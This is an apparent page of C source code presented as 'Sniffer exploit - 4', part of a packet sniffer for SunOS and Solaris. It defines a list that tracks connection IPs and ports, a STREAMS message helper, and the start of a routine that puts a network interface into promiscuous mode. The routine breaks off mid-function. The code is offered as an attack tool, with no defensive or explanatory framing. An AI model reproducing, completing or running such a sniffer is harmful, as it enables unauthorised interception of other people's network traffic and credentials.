Sniffer exploit - 4


 

struct conn_list{

struct conn_list *next_p;

char sourceIP[16],destIP[16];

unsigned long sourcePort,destPort;

};

 

struct conn_list *cl; struct conn_list *org_cl;

 

#ifdef SOLARIS

int strgetmsg(fd, ctlp, flagsp, caller)

int fd;

struct strbuf *ctlp;

int *flagsp;

char *caller;

{

int rc;

static char errmsg[80];

*flagsp = 0;

if ((rc=getmsg(fd,ctlp,NULL,flagsp))<0) return(-2);

if (alarm(0)<0) return(-3);

if ((rc&(MORECTL|MOREDATA))==(MORECTL|MOREDATA)) return(-4);

if (rc&MORECTL) return(-5);

if (rc&MOREDATA) return(-6);

if (ctlp->len<sizeof(long)) return(-7);

return(0);

}

#endif

 

int setnic_promisc(nit_dev,nic_name)

char *nit_dev;

char *nic_name;

{

int sock; struct ifreq f;

#ifdef SUNOS4

struct strioctl si; struct timeval timeout;

u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC;

if ((sock = open(nit_dev, O_RDONLY)) < 0) return(-1);

if (ioctl(sock, I_SRDOPT, (char *)RMSGD) < 0) return(-2);

si.ic_timout = INFTIM;

if (ioctl(sock, I_PUSH, "nbuf") < 0) return(-3);

timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME;

si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout;

if (ioctl(sock, I_STR, (char *)&si) < 0) return(-4);

si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize);

si.ic_dp = (char *)&chunksize;

if (ioctl(sock, I_STR, (char *)&si) < 0) return(-5);

strncpy(f.ifr_name, nic_name, sizeof(f.ifr_name));

f.ifr_name[sizeof(f.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND;




- -  - -  - -